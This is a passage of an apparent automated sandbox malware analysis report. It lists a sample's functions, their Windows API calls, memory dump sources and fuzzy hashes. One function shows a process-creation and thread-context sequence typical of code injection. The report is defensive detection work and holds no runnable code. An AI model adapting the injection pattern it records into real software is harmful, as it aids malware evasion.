                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                Function 0041EF5F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000109,00000000,00425BA7,00074000,00000109,?,00425BA7,00000109,00000000,00000000), ref: 0041EF8E
                                                                                                                • GetLastError.KERNEL32(?,00425BA7,00000109,00000000,00000000), ref: 0041EF9B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: d0e113ae251f39dc1295bd3d0d5c570924977ae37561d63c63e682e8777c236f
                                                                                                                • Instruction ID: cf4b6fdaa65d58340d4e2f426219068bfe2c256bea3d67c41a1efc08f55daa7f
                                                                                                                • Opcode Fuzzy Hash: d0e113ae251f39dc1295bd3d0d5c570924977ae37561d63c63e682e8777c236f
                                                                                                                • Instruction Fuzzy Hash: 4401F4366145147BCA115BBAAC089DA3B699F82334B250726FE34CF1D1CB78C88297A9
                                                                                                                Function 00413A88 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 2972400715-0
                                                                                                                • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                Function 004098B8 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1706434739-0
                                                                                                                • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                                • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                                                                • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                                • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                                                                Function 004098B6 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1706434739-0
                                                                                                                • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                                • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                                                                • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                                • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                                                                Function 0041E517 Relevance: 2.6, APIs: 2, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(00000000,00000000,00000109,?,0042595E,00000109), ref: 0041E569
                                                                                                                • GetLastError.KERNEL32(?,0042595E,00000109), ref: 0041E573
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 918212764-0
                                                                                                                • Opcode ID: bcac448e53919a337955079ba1fb01489cacc7633263b2fdf1f383f96fd6d644
                                                                                                                • Instruction ID: 19e2beeb38f2cf2c4278f884dded42d16dad9246bf5dd3ae84917a532f316d83
                                                                                                                • Opcode Fuzzy Hash: bcac448e53919a337955079ba1fb01489cacc7633263b2fdf1f383f96fd6d644
                                                                                                                • Instruction Fuzzy Hash: 34010C3691512035C61162BA5905BEB26868F8273CF59011BFD18873D2FB6DCCC2829D
                                                                                                                Function 04548775 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 04548F33
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04548FC9
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04548FEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                • Instruction ID: 0ae6821dca1065cfaf661879003ad06364eb42910043a86d5853f04d2d1545bc
                                                                                                                • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                • Instruction Fuzzy Hash: FB12DE24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A4E77A5E81CF5A
                                                                                                                Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                Function 004138BA Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 03b941ca31b2eefa3ee245af14a45a05522b7591dd32a7038f61ecb62e62ab21
                                                                                                                • Instruction ID: ed42b26ac187221e93853d6dfd9c7f51b54a687a62893bdaf2a19a7afcae2479
                                                                                                                • Opcode Fuzzy Hash: 03b941ca31b2eefa3ee245af14a45a05522b7591dd32a7038f61ecb62e62ab21
                                                                                                                • Instruction Fuzzy Hash: F91106B25156155ADA112F2ADC01BEB7798DF0136AF11013BF940AB2A0CBEC8EC186DC
                                                                                                                Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                                                • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                • Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                                                • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 181713994-0
                                                                                                                • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 10892065-0
                                                                                                                • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$PointerWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 539440098-0
                                                                                                                • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 181713994-0
                                                                                                                • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                Function 00416FB6 Relevance: 1.3, APIs: 1, Instructions: 28sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                • Sleep.KERNEL32(00000000,00000001,00411739,?,00418391,00000018,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00416FD7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeapSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4201116106-0
                                                                                                                • Opcode ID: 7351f003d9c4e269a066673786ffac8decad1e325cedd491f8ecc1fa6b0779cb
                                                                                                                • Instruction ID: 62b9039d0dc2d1652bd8483666354cb4007973faf85ac804ab3d87b56acb7484
                                                                                                                • Opcode Fuzzy Hash: 7351f003d9c4e269a066673786ffac8decad1e325cedd491f8ecc1fa6b0779cb
                                                                                                                • Instruction Fuzzy Hash: 6DE0923290051557CB206A7AF8488CB7F9ADA913B5322077BF538C2390DA25CD86829C
                                                                                                                Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                Function 04549778 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 04549789
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction ID: f704adafb62a01a962ab7678d82c97002e13ec67ce648bf55cfd1948e3fc29d2
                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction Fuzzy Hash: DEE0E67498010DDFDB00DFB4D54969E7BB4FF04301F100561FD01D2280D6319D509A62

                                                                                                                Non-executed Functions

                                                                                                                Function 0047C08E Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 676windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
